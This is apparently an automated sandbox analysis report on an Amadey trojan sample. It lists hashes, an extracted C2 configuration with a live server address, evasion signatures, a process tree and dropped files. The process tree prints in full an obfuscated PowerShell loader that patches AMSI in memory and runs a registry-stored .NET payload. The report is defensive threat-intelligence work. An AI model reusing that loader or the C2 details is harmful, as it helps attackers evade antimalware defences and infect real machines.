Resubmissions
14-05-2024 20:58
240514-zsfmfsgb6s 1014-05-2024 20:53
240514-zplpasfh6x 1014-05-2024 19:25
240514-x4yajach28 10Analysis
-
max time kernel
1200s -
max time network
1173s -
platform
windows10-2004_x64 -
resource
win10v2004-20240508-en -
resource tags
-
submitted
14-05-2024 20:53
General
-
Target
3ed263e2d66c3a0dcace52a0755ce7eae5f72e352190286c9e5151e5bf5d0d77.exe
-
Size
1.8MB
-
MD5
2307c3f2702a53fdc03bf2f05fe51a25
-
SHA1
5d31c179f4d5e0831fb5ad877fbfe8fe6b88a26d
-
SHA256
3ed263e2d66c3a0dcace52a0755ce7eae5f72e352190286c9e5151e5bf5d0d77
-
SHA512
14c7feba21ae7b6b3e3d1bf06a8dea88c784ba1e5e86ffd9724be66ef880bfb89c66ae5f906e1d7c9fc18635b892ec32255ecad57dd71c11d4e40a2f9922e6bf
-
SSDEEP
49152:VKrUl9aoaN6dMU27MyNw2e9ObxiFlWukA+dEoBpck6Co:VKrb6bmw2mOliFlWuQxpcN
Score
10/10
Malware Config
Extracted
Family
amadey
Version
4.20
C2
http://5.42.96.7
Attributes
-
install_dir
7af68cdb52
-
install_file
axplons.exe
-
strings_key
e2ce58e78f631ed97d01fe7b70e85d5e
-
url_paths
/zamo7h/index.php
rc4.plain
Signatures
-
Amadey
Amadey bot is a simple trojan bot primarily used for collecting reconnaissance information.
-
Detect ZGRat V1 1 IoCs
-
Suspicious use of NtCreateProcessExOtherParentProcess 1 IoCs
-
Suspicious use of NtCreateUserProcessOtherParentProcess 2 IoCs
-
ZGRat
ZGRat is remote access trojan written in C#.
-
Identifies VirtualBox via ACPI registry values (likely anti-VM) 2 TTPs 22 IoCs
-
Downloads MZ/PE file
-
Checks BIOS information in registry 2 TTPs 44 IoCs
BIOS information is often read in order to detect sandboxing environments.
-
Checks computer location settings 2 TTPs 2 IoCs
Looks up country code configured in the registry, likely geofence.
-
Drops startup file 1 IoCs
-
Executes dropped EXE 24 IoCs
-
Identifies Wine through registry keys 2 TTPs 22 IoCs
Wine is a compatibility layer capable of running Windows applications, which can be used as sandboxing environment.
-
Drops file in System32 directory 4 IoCs
-
Suspicious use of NtSetInformationThreadHideFromDebugger 22 IoCs
-
Suspicious use of SetThreadContext 3 IoCs
-
Drops file in Windows directory 1 IoCs
-
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).
-
Program crash 1 IoCs
-
Checks processor information in registry 2 TTPs 3 IoCs
Processor information is often read in order to detect sandboxing environments.
-
Enumerates system info in registry 2 TTPs 2 IoCs
-
Modifies data under HKEY_USERS 53 IoCs
-
Suspicious behavior: EnumeratesProcesses 64 IoCs
-
Suspicious use of AdjustPrivilegeToken 21 IoCs
-
Suspicious use of FindShellTrayWindow 1 IoCs
-
Suspicious use of WriteProcessMemory 64 IoCs
Processes
-
C:\Windows\system32\winlogon.exewinlogon.exe1⤵
-
C:\Windows\system32\dwm.exe"dwm.exe"2⤵
- Suspicious use of AdjustPrivilegeToken
-
C:\Windows\System32\dllhost.exeC:\Windows\System32\dllhost.exe /Processid:{3b283a64-0ea0-4e52-8c44-d450924c9d58}2⤵
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
-
C:\Windows\system32\lsass.exeC:\Windows\system32\lsass.exe1⤵
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k DcomLaunch -p -s LSM1⤵
-
C:\Windows\System32\svchost.exeC:\Windows\System32\svchost.exe -k LocalSystemNetworkRestricted -p -s NcbService1⤵
-
C:\Windows\System32\svchost.exeC:\Windows\System32\svchost.exe -k LocalServiceNetworkRestricted -p -s lmhosts1⤵
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k LocalServiceNetworkRestricted -p -s TimeBrokerSvc1⤵
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k netsvcs -p -s Schedule1⤵
-
C:\Windows\system32\taskhostw.exetaskhostw.exe {222A245B-E637-4AE9-A93F-A59CA119A75E}2⤵
-
C:\Users\Admin\AppData\Local\Temp\7af68cdb52\axplons.exeC:\Users\Admin\AppData\Local\Temp\7af68cdb52\axplons.exe2⤵
- Identifies VirtualBox via ACPI registry values (likely anti-VM)
- Checks BIOS information in registry
- Executes dropped EXE
- Identifies Wine through registry keys
- Suspicious use of NtSetInformationThreadHideFromDebugger
- Suspicious behavior: EnumeratesProcesses
-
C:\Users\Admin\AppData\Local\Temp\7af68cdb52\axplons.exeC:\Users\Admin\AppData\Local\Temp\7af68cdb52\axplons.exe2⤵
- Identifies VirtualBox via ACPI registry values (likely anti-VM)
- Checks BIOS information in registry
- Executes dropped EXE
- Identifies Wine through registry keys
- Suspicious use of NtSetInformationThreadHideFromDebugger
- Suspicious behavior: EnumeratesProcesses
-
C:\Users\Admin\AppData\Local\Temp\7af68cdb52\axplons.exeC:\Users\Admin\AppData\Local\Temp\7af68cdb52\axplons.exe2⤵
- Identifies VirtualBox via ACPI registry values (likely anti-VM)
- Checks BIOS information in registry
- Executes dropped EXE
- Identifies Wine through registry keys
- Suspicious use of NtSetInformationThreadHideFromDebugger
- Suspicious behavior: EnumeratesProcesses
-
C:\Users\Admin\AppData\Local\Temp\7af68cdb52\axplons.exeC:\Users\Admin\AppData\Local\Temp\7af68cdb52\axplons.exe2⤵
- Identifies VirtualBox via ACPI registry values (likely anti-VM)
- Checks BIOS information in registry
- Executes dropped EXE
- Identifies Wine through registry keys
- Suspicious use of NtSetInformationThreadHideFromDebugger
- Suspicious behavior: EnumeratesProcesses
-
C:\Users\Admin\AppData\Local\Temp\7af68cdb52\axplons.exeC:\Users\Admin\AppData\Local\Temp\7af68cdb52\axplons.exe2⤵
- Identifies VirtualBox via ACPI registry values (likely anti-VM)
- Checks BIOS information in registry
- Executes dropped EXE
- Identifies Wine through registry keys
- Suspicious use of NtSetInformationThreadHideFromDebugger
- Suspicious behavior: EnumeratesProcesses
-
C:\Users\Admin\AppData\Local\Temp\7af68cdb52\axplons.exeC:\Users\Admin\AppData\Local\Temp\7af68cdb52\axplons.exe2⤵
- Identifies VirtualBox via ACPI registry values (likely anti-VM)
- Checks BIOS information in registry
- Executes dropped EXE
- Identifies Wine through registry keys
- Suspicious use of NtSetInformationThreadHideFromDebugger
- Suspicious behavior: EnumeratesProcesses
-
C:\Users\Admin\AppData\Local\Temp\7af68cdb52\axplons.exeC:\Users\Admin\AppData\Local\Temp\7af68cdb52\axplons.exe2⤵
- Identifies VirtualBox via ACPI registry values (likely anti-VM)
- Checks BIOS information in registry
- Executes dropped EXE
- Identifies Wine through registry keys
- Suspicious use of NtSetInformationThreadHideFromDebugger
- Suspicious behavior: EnumeratesProcesses
-
C:\Users\Admin\AppData\Local\Temp\7af68cdb52\axplons.exeC:\Users\Admin\AppData\Local\Temp\7af68cdb52\axplons.exe2⤵
- Identifies VirtualBox via ACPI registry values (likely anti-VM)
- Checks BIOS information in registry
- Executes dropped EXE
- Identifies Wine through registry keys
- Suspicious use of NtSetInformationThreadHideFromDebugger
- Suspicious behavior: EnumeratesProcesses
-
C:\Users\Admin\AppData\Local\Temp\7af68cdb52\axplons.exeC:\Users\Admin\AppData\Local\Temp\7af68cdb52\axplons.exe2⤵
- Identifies VirtualBox via ACPI registry values (likely anti-VM)
- Checks BIOS information in registry
- Executes dropped EXE
- Identifies Wine through registry keys
- Suspicious use of NtSetInformationThreadHideFromDebugger
- Suspicious behavior: EnumeratesProcesses
-
C:\Users\Admin\AppData\Local\Temp\7af68cdb52\axplons.exeC:\Users\Admin\AppData\Local\Temp\7af68cdb52\axplons.exe2⤵
- Identifies VirtualBox via ACPI registry values (likely anti-VM)
- Checks BIOS information in registry
- Executes dropped EXE
- Identifies Wine through registry keys
- Suspicious use of NtSetInformationThreadHideFromDebugger
- Suspicious behavior: EnumeratesProcesses
-
C:\Users\Admin\AppData\Local\Temp\7af68cdb52\axplons.exeC:\Users\Admin\AppData\Local\Temp\7af68cdb52\axplons.exe2⤵
- Identifies VirtualBox via ACPI registry values (likely anti-VM)
- Checks BIOS information in registry
- Executes dropped EXE
- Identifies Wine through registry keys
- Suspicious use of NtSetInformationThreadHideFromDebugger
- Suspicious behavior: EnumeratesProcesses
-
C:\Users\Admin\AppData\Local\Temp\7af68cdb52\axplons.exeC:\Users\Admin\AppData\Local\Temp\7af68cdb52\axplons.exe2⤵
- Identifies VirtualBox via ACPI registry values (likely anti-VM)
- Checks BIOS information in registry
- Executes dropped EXE
- Identifies Wine through registry keys
- Suspicious use of NtSetInformationThreadHideFromDebugger
- Suspicious behavior: EnumeratesProcesses
-
C:\Users\Admin\AppData\Local\Temp\7af68cdb52\axplons.exeC:\Users\Admin\AppData\Local\Temp\7af68cdb52\axplons.exe2⤵
- Identifies VirtualBox via ACPI registry values (likely anti-VM)
- Checks BIOS information in registry
- Executes dropped EXE
- Identifies Wine through registry keys
- Suspicious use of NtSetInformationThreadHideFromDebugger
- Suspicious behavior: EnumeratesProcesses
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXEC:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE "function Local:knEhKFZhtiUd{Param([OutputType([Type])][Parameter(Position=0)][Type[]]$PwwOfaRLPFPdHR,[Parameter(Position=1)][Type]$vtvcpXIUxq)$vuboJrvRyYN=[AppDomain]::CurrentDomain.DefineDynamicAssembly((New-Object Reflection.AssemblyName(''+'R'+''+'e'+'f'+'l'+''+'e'+''+'c'+''+[Char](116)+''+[Char](101)+''+'d'+''+[Char](68)+''+[Char](101)+''+[Char](108)+'e'+[Char](103)+''+[Char](97)+'te')),[Reflection.Emit.AssemblyBuilderAccess]::Run).DefineDynamicModule(''+[Char](73)+'nM'+[Char](101)+''+'m'+''+[Char](111)+'r'+[Char](121)+''+'M'+''+[Char](111)+'du'+'l'+''+'e'+'',$False).DefineType(''+'M'+''+[Char](121)+'D'+[Char](101)+''+[Char](108)+''+'e'+''+[Char](103)+''+'a'+''+[Char](116)+''+[Char](101)+''+'T'+''+'y'+''+[Char](112)+''+[Char](101)+'',''+'C'+''+[Char](108)+''+'a'+''+[Char](115)+''+[Char](115)+',P'+[Char](117)+''+'b'+''+[Char](108)+'ic,S'+[Char](101)+''+[Char](97)+''+[Char](108)+''+[Char](101)+''+[Char](100)+''+[Char](44)+''+[Char](65)+''+'n'+'s'+[Char](105)+''+'C'+'l'+[Char](97)+''+[Char](115)+''+[Char](115)+''+','+''+'A'+'u'+[Char](116)+''+'o'+'C'+[Char](108)+''+'a'+'s'+[Char](115)+'',[MulticastDelegate]);$vuboJrvRyYN.DefineConstructor('R'+'T'+''+[Char](83)+''+'p'+'ec'+[Char](105)+''+[Char](97)+''+'l'+''+[Char](78)+''+'a'+''+'m'+''+[Char](101)+''+[Char](44)+''+[Char](72)+''+[Char](105)+''+[Char](100)+'e'+[Char](66)+''+[Char](121)+''+[Char](83)+''+[Char](105)+''+[Char](103)+','+'P'+''+[Char](117)+'b'+[Char](108)+'ic',[Reflection.CallingConventions]::Standard,$PwwOfaRLPFPdHR).SetImplementationFlags('R'+[Char](117)+''+[Char](110)+''+'t'+''+[Char](105)+''+[Char](109)+''+'e'+''+','+''+[Char](77)+''+[Char](97)+''+'n'+''+[Char](97)+''+[Char](103)+''+'e'+''+[Char](100)+'');$vuboJrvRyYN.DefineMethod(''+[Char](73)+''+[Char](110)+''+[Char](118)+''+'o'+''+[Char](107)+''+[Char](101)+'',''+[Char](80)+''+'u'+'b'+[Char](108)+''+'i'+''+[Char](99)+''+','+''+[Char](72)+''+[Char](105)+'d'+'e'+'B'+[Char](121)+''+'S'+''+[Char](105)+''+[Char](103)+','+'N'+''+[Char](101)+''+[Char](119)+'Sl'+'o'+'t'+[Char](44)+''+'V'+'i'+[Char](114)+'tu'+'a'+'l',$vtvcpXIUxq,$PwwOfaRLPFPdHR).SetImplementationFlags('R'+[Char](117)+''+'n'+''+[Char](116)+''+[Char](105)+'m'+'e'+''+[Char](44)+'M'+[Char](97)+'n'+[Char](97)+''+'g'+''+[Char](101)+'d');Write-Output $vuboJrvRyYN.CreateType();}$HnJLFHAaTbnZf=([AppDomain]::CurrentDomain.GetAssemblies()|Where-Object{$_.GlobalAssemblyCache -And $_.Location.Split('\')[-1].Equals(''+[Char](83)+''+[Char](121)+''+[Char](115)+''+[Char](116)+''+[Char](101)+'m'+[Char](46)+''+[Char](100)+'l'+[Char](108)+'')}).GetType('M'+[Char](105)+'c'+[Char](114)+''+'o'+''+'s'+'o'+[Char](102)+'t'+'.'+''+'W'+''+'i'+''+[Char](110)+''+[Char](51)+'2'+[Char](46)+'U'+'n'+''+[Char](115)+''+[Char](97)+''+[Char](102)+''+[Char](101)+''+[Char](78)+'a'+[Char](116)+'iv'+'e'+'M'+[Char](101)+''+'t'+''+[Char](104)+'o'+[Char](100)+''+[Char](115)+'');$vcGGfqzxoLEIiB=$HnJLFHAaTbnZf.GetMethod(''+[Char](71)+''+[Char](101)+''+'t'+''+[Char](80)+''+[Char](114)+'o'+[Char](99)+''+[Char](65)+''+[Char](100)+''+'d'+''+[Char](114)+''+[Char](101)+'s'+[Char](115)+'',[Reflection.BindingFlags](''+[Char](80)+''+[Char](117)+'bl'+'i'+'c'+[Char](44)+''+'S'+''+'t'+''+[Char](97)+''+'t'+''+[Char](105)+''+[Char](99)+''),$Null,[Reflection.CallingConventions]::Any,@((New-Object IntPtr).GetType(),[string]),$Null);$IiNFdNBXLnZGVbYcNwB=knEhKFZhtiUd @([String])([IntPtr]);$xiYyyTeGgADoZipeeujTty=knEhKFZhtiUd @([IntPtr],[UIntPtr],[UInt32],[UInt32].MakeByRefType())([Bool]);$dXKEOnRTTBK=$HnJLFHAaTbnZf.GetMethod('Get'+[Char](77)+''+[Char](111)+'d'+'u'+''+[Char](108)+''+[Char](101)+''+'H'+'an'+[Char](100)+''+'l'+''+[Char](101)+'').Invoke($Null,@([Object](''+[Char](107)+''+[Char](101)+''+'r'+''+[Char](110)+'e'+[Char](108)+'3'+[Char](50)+''+[Char](46)+'dl'+[Char](108)+'')));$hJZSSoFEjmfMaL=$vcGGfqzxoLEIiB.Invoke($Null,@([Object]$dXKEOnRTTBK,[Object](''+'L'+''+[Char](111)+'a'+'d'+''+[Char](76)+''+[Char](105)+''+[Char](98)+'r'+'a'+'ry'+[Char](65)+'')));$BhgNSnzQxKHRBVVaO=$vcGGfqzxoLEIiB.Invoke($Null,@([Object]$dXKEOnRTTBK,[Object]('V'+'i'+'r'+[Char](116)+''+'u'+''+[Char](97)+'lP'+[Char](114)+''+[Char](111)+''+[Char](116)+''+'e'+''+[Char](99)+''+[Char](116)+'')));$dxMHJmD=[Runtime.InteropServices.Marshal]::GetDelegateForFunctionPointer($hJZSSoFEjmfMaL,$IiNFdNBXLnZGVbYcNwB).Invoke(''+[Char](97)+''+[Char](109)+''+'s'+'i'+'.'+''+[Char](100)+''+'l'+''+[Char](108)+'');$pKUHtOqeWHKwJcPju=$vcGGfqzxoLEIiB.Invoke($Null,@([Object]$dxMHJmD,[Object](''+'A'+'ms'+[Char](105)+''+'S'+'c'+[Char](97)+''+[Char](110)+''+[Char](66)+''+[Char](117)+''+'f'+''+[Char](102)+''+[Char](101)+''+[Char](114)+'')));$SBKDBzeLVt=0;[Runtime.InteropServices.Marshal]::GetDelegateForFunctionPointer($BhgNSnzQxKHRBVVaO,$xiYyyTeGgADoZipeeujTty).Invoke($pKUHtOqeWHKwJcPju,[uint32]8,4,[ref]$SBKDBzeLVt);[Runtime.InteropServices.Marshal]::Copy([Byte[]](0xb8,0x57,0,7,0x80,0xc3),0,$pKUHtOqeWHKwJcPju,6);[Runtime.InteropServices.Marshal]::GetDelegateForFunctionPointer($BhgNSnzQxKHRBVVaO,$xiYyyTeGgADoZipeeujTty).Invoke($pKUHtOqeWHKwJcPju,[uint32]8,0x20,[ref]$SBKDBzeLVt);[Reflection.Assembly]::Load([Microsoft.Win32.Registry]::LocalMachine.OpenSubkey(''+[Char](83)+''+[Char](79)+''+[Char](70)+''+'T'+'W'+[Char](65)+''+[Char](82)+''+'E'+'').GetValue(''+[Char](36)+'7'+[Char](55)+''+[Char](115)+''+[Char](116)+''+'a'+''+[Char](103)+'er')).EntryPoint.Invoke($Null,$Null)"2⤵
- Suspicious use of NtCreateUserProcessOtherParentProcess
- Drops file in System32 directory
- Suspicious use of SetThreadContext
- Modifies data under HKEY_USERS
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
-
C:\Users\Admin\AppData\Local\Temp\7af68cdb52\axplons.exeC:\Users\Admin\AppData\Local\Temp\7af68cdb52\axplons.exe2⤵
- Identifies VirtualBox via ACPI registry values (likely anti-VM)
- Checks BIOS information in registry
- Executes dropped EXE
- Identifies Wine through registry keys
- Suspicious use of NtSetInformationThreadHideFromDebugger
-
C:\Users\Admin\AppData\Local\Temp\7af68cdb52\axplons.exeC:\Users\Admin\AppData\Local\Temp\7af68cdb52\axplons.exe2⤵
- Identifies VirtualBox via ACPI registry values (likely anti-VM)
- Checks BIOS information in registry
- Executes dropped EXE
- Identifies Wine through registry keys
- Suspicious use of NtSetInformationThreadHideFromDebugger
-
C:\Users\Admin\AppData\Local\Temp\7af68cdb52\axplons.exeC:\Users\Admin\AppData\Local\Temp\7af68cdb52\axplons.exe2⤵
- Identifies VirtualBox via ACPI registry values (likely anti-VM)
- Checks BIOS information in registry
- Executes dropped EXE
- Identifies Wine through registry keys
- Suspicious use of NtSetInformationThreadHideFromDebugger
-
C:\Users\Admin\AppData\Local\Temp\7af68cdb52\axplons.exeC:\Users\Admin\AppData\Local\Temp\7af68cdb52\axplons.exe2⤵
- Identifies VirtualBox via ACPI registry values (likely anti-VM)
- Checks BIOS information in registry
- Executes dropped EXE
- Identifies Wine through registry keys
- Suspicious use of NtSetInformationThreadHideFromDebugger
-
C:\Users\Admin\AppData\Local\Temp\7af68cdb52\axplons.exeC:\Users\Admin\AppData\Local\Temp\7af68cdb52\axplons.exe2⤵
- Identifies VirtualBox via ACPI registry values (likely anti-VM)
- Checks BIOS information in registry
- Executes dropped EXE
- Identifies Wine through registry keys
- Suspicious use of NtSetInformationThreadHideFromDebugger
-
C:\Users\Admin\AppData\Local\Temp\7af68cdb52\axplons.exeC:\Users\Admin\AppData\Local\Temp\7af68cdb52\axplons.exe2⤵
- Identifies VirtualBox via ACPI registry values (likely anti-VM)
- Checks BIOS information in registry
- Executes dropped EXE
- Identifies Wine through registry keys
- Suspicious use of NtSetInformationThreadHideFromDebugger
-
C:\Users\Admin\AppData\Local\Temp\7af68cdb52\axplons.exeC:\Users\Admin\AppData\Local\Temp\7af68cdb52\axplons.exe2⤵
- Identifies VirtualBox via ACPI registry values (likely anti-VM)
- Checks BIOS information in registry
- Executes dropped EXE
- Identifies Wine through registry keys
- Suspicious use of NtSetInformationThreadHideFromDebugger
-
C:\Windows\System32\svchost.exeC:\Windows\System32\svchost.exe -k LocalServiceNetworkRestricted -p -s EventLog1⤵
- Drops file in System32 directory
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k netsvcs -p -s ProfSvc1⤵
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k LocalService -p -s DispBrokerDesktopSvc1⤵
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k LocalService -p -s nsi1⤵
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k netsvcs -p -s UserManager1⤵
-
C:\Windows\system32\sihost.exesihost.exe2⤵
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k LocalService -p -s EventSystem1⤵
-
C:\Windows\System32\svchost.exeC:\Windows\System32\svchost.exe -k netsvcs -p -s Themes1⤵
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k LocalServiceNetworkRestricted -p -s Dhcp1⤵
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k netsvcs -p -s SENS1⤵
-
C:\Windows\System32\svchost.exeC:\Windows\System32\svchost.exe -k NetworkService -p -s NlaSvc1⤵
-
C:\Windows\System32\svchost.exeC:\Windows\System32\svchost.exe -k LocalSystemNetworkRestricted -p -s AudioEndpointBuilder1⤵
-
C:\Windows\System32\svchost.exeC:\Windows\System32\svchost.exe -k LocalService -p -s netprofm1⤵
-
C:\Windows\System32\svchost.exeC:\Windows\System32\svchost.exe -k LocalServiceNetworkRestricted -p1⤵
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k NetworkService -p -s Dnscache1⤵
-
C:\Windows\System32\svchost.exeC:\Windows\System32\svchost.exe -k LocalServiceNetworkRestricted -p1⤵
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k appmodel -p -s StateRepository1⤵
-
C:\Windows\System32\svchost.exeC:\Windows\System32\svchost.exe -k netsvcs -p -s ShellHWDetection1⤵
-
C:\Windows\System32\svchost.exeC:\Windows\System32\svchost.exe -k LocalServiceNetworkRestricted -s RmSvc1⤵
-
C:\Windows\System32\spoolsv.exeC:\Windows\System32\spoolsv.exe1⤵
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k netsvcs -p -s Winmgmt1⤵
-
C:\Windows\System32\svchost.exeC:\Windows\System32\svchost.exe -k NetworkService -p -s LanmanWorkstation1⤵
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k UnistackSvcGroup -s CDPUserSvc1⤵
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k netsvcs -p -s IKEEXT1⤵
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k NetworkServiceNetworkRestricted -p -s PolicyAgent1⤵
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k NetworkService -p -s CryptSvc1⤵
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k netsvcs -p -s LanmanServer1⤵
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k netsvcs -p -s TokenBroker1⤵
-
C:\Windows\sysmon.exeC:\Windows\sysmon.exe1⤵
-
C:\Windows\System32\svchost.exeC:\Windows\System32\svchost.exe -k LocalSystemNetworkRestricted -p -s TrkWks1⤵
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k netsvcs -p -s WpnService1⤵
-
C:\Windows\system32\wbem\unsecapp.exeC:\Windows\system32\wbem\unsecapp.exe -Embedding1⤵
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k LocalService -p -s CDPSvc1⤵
-
C:\Windows\Explorer.EXEC:\Windows\Explorer.EXE1⤵
- Suspicious use of AdjustPrivilegeToken
-
C:\Users\Admin\AppData\Local\Temp\3ed263e2d66c3a0dcace52a0755ce7eae5f72e352190286c9e5151e5bf5d0d77.exe"C:\Users\Admin\AppData\Local\Temp\3ed263e2d66c3a0dcace52a0755ce7eae5f72e352190286c9e5151e5bf5d0d77.exe"2⤵
- Identifies VirtualBox via ACPI registry values (likely anti-VM)
- Checks BIOS information in registry
- Checks computer location settings
- Identifies Wine through registry keys
- Suspicious use of NtSetInformationThreadHideFromDebugger
- Drops file in Windows directory
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of FindShellTrayWindow
- Suspicious use of WriteProcessMemory
-
C:\Users\Admin\AppData\Local\Temp\7af68cdb52\axplons.exe"C:\Users\Admin\AppData\Local\Temp\7af68cdb52\axplons.exe"3⤵
- Identifies VirtualBox via ACPI registry values (likely anti-VM)
- Checks BIOS information in registry
- Checks computer location settings
- Executes dropped EXE
- Identifies Wine through registry keys
- Suspicious use of NtSetInformationThreadHideFromDebugger
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of WriteProcessMemory
-
C:\Users\Admin\AppData\Local\Temp\1000043001\Kaxhwswfup.exe"C:\Users\Admin\AppData\Local\Temp\1000043001\Kaxhwswfup.exe"4⤵
- Drops startup file
- Executes dropped EXE
- Suspicious use of SetThreadContext
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
-
C:\Users\Admin\AppData\Local\Temp\$77f4daf3"C:\Users\Admin\AppData\Local\Temp\$77f4daf3"5⤵
- Executes dropped EXE
-
C:\Users\Admin\AppData\Local\Temp\$77db5b93"C:\Users\Admin\AppData\Local\Temp\$77db5b93"5⤵
- Executes dropped EXE
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 636 -s 6006⤵
- Program crash
- Checks processor information in registry
- Enumerates system info in registry
- Suspicious use of AdjustPrivilegeToken
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k ClipboardSvcGroup -p -s cbdhsvc1⤵
-
C:\Windows\system32\DllHost.exeC:\Windows\system32\DllHost.exe /Processid:{3EB3C877-1F16-487C-9050-104DBCD66683}1⤵
-
C:\Windows\System32\RuntimeBroker.exeC:\Windows\System32\RuntimeBroker.exe -Embedding1⤵
-
C:\Windows\System32\RuntimeBroker.exeC:\Windows\System32\RuntimeBroker.exe -Embedding1⤵
-
C:\Windows\System32\RuntimeBroker.exeC:\Windows\System32\RuntimeBroker.exe -Embedding1⤵
-
C:\Windows\System32\svchost.exeC:\Windows\System32\svchost.exe -k LocalSystemNetworkRestricted -p -s StorSvc1⤵
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k LocalServiceAndNoImpersonation -p -s SSDPSRV1⤵
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k LocalServiceNetworkRestricted -p -s WinHttpAutoProxySvc1⤵
- Modifies data under HKEY_USERS
-
C:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exe"C:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exe" /service1⤵
- Modifies data under HKEY_USERS
-
C:\Windows\system32\SppExtComObj.exeC:\Windows\system32\SppExtComObj.exe -Embedding1⤵
-
C:\Windows\System32\svchost.exeC:\Windows\System32\svchost.exe -k LocalService -p -s LicenseManager1⤵
-
C:\Windows\system32\DllHost.exeC:\Windows\system32\DllHost.exe /Processid:{3EB3C877-1F16-487C-9050-104DBCD66683}1⤵
-
C:\Windows\System32\svchost.exeC:\Windows\System32\svchost.exe -k WerSvcGroup1⤵
- Suspicious use of NtCreateUserProcessOtherParentProcess
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -pss -s 404 -p 636 -ip 6362⤵
- Suspicious use of NtCreateProcessExOtherParentProcess
Network
MITRE ATT&CK Enterprise v15
Replay Monitor
Loading Replay Monitor...
Downloads
-
C:\ProgramData\Microsoft\Windows\WER\Temp\WER4617.tmp.csvFilesize
33KB
MD5b17ca33fe022e777440114c1da16a3ec
SHA1c4fa3b34c81cfbb027dec0a479e9bfdf7987ba01
SHA256855da7199c2bf401f2df2f1e7859e4eb8f0e7d2184948097a2598fc1f1bdad75
SHA512059c8ca1b3bcf9760e414a7c153a11479bbadfc942cb81026e133f1d98ae157d06bce4ffbfc9d6b93e74deec8bff0bbf6638ec4ff1f7604ae2646d9b3199aed6
-
C:\ProgramData\Microsoft\Windows\WER\Temp\WER4656.tmp.txtFilesize
13KB
MD5dbf5ef22d113742e6def689da043ab5f
SHA11d92096f8d50cdf3c7b1ff15d9d9f433549a1c64
SHA25662df8ab1d49fe0cc101a14d7c194dd1ca9227acff7b3cf500f13e1ec4122f66e
SHA5127dbdf63ed17e8c4281b35f0c851764f993c658aa248d049a8333fd2def18371df870872f6f0bca6c1928bd34f8bfcdfb55e6f86cf67e091e8112c5e50eba163d
-
C:\Users\Admin\AppData\Local\Temp\1000043001\Kaxhwswfup.exeFilesize
4.5MB
MD5133fda00a490e613f3a6c511c1c660eb
SHA1e34f9f1c622a7e6d3cb34217b0935ebdaab8ebe9
SHA256cac0056b23a93519a5f4e526e52187f37b88373c76aa065b9f895d1ecd4f4169
SHA512f4dd02b04326e37a3368d9c385b363689f877ae43c16de103efada642f41fe85580939db84a030597e3032d6da407d073af2b64160feec6fe38f37f1b473fffd
-
C:\Users\Admin\AppData\Local\Temp\7af68cdb52\axplons.exeFilesize
1.8MB
MD52307c3f2702a53fdc03bf2f05fe51a25
SHA15d31c179f4d5e0831fb5ad877fbfe8fe6b88a26d
SHA2563ed263e2d66c3a0dcace52a0755ce7eae5f72e352190286c9e5151e5bf5d0d77
SHA51214c7feba21ae7b6b3e3d1bf06a8dea88c784ba1e5e86ffd9724be66ef880bfb89c66ae5f906e1d7c9fc18635b892ec32255ecad57dd71c11d4e40a2f9922e6bf
-
C:\Windows\Temp\__PSScriptPolicyTest_i0ingr0a.aos.ps1Filesize
60B
MD5d17fe0a3f47be24a6453e9ef58c94641
SHA16ab83620379fc69f80c0242105ddffd7d98d5d9d
SHA25696ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7
SHA5125b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82
-
memory/208-65-0x0000000000650000-0x0000000000B0E000-memory.dmpFilesize
4.7MB
-
memory/1160-153-0x0000000007080000-0x00000000072C0000-memory.dmpFilesize
2.2MB
-
memory/1160-152-0x0000000000FE0000-0x0000000001466000-memory.dmpFilesize
4.5MB
-
memory/1160-154-0x0000000007870000-0x0000000007E14000-memory.dmpFilesize
5.6MB
-
memory/1160-155-0x0000000007360000-0x00000000073F2000-memory.dmpFilesize
584KB
-
memory/1160-5692-0x00000000077A0000-0x00000000077F4000-memory.dmpFilesize
336KB
-
memory/1160-5040-0x0000000007570000-0x00000000075EE000-memory.dmpFilesize
504KB
-
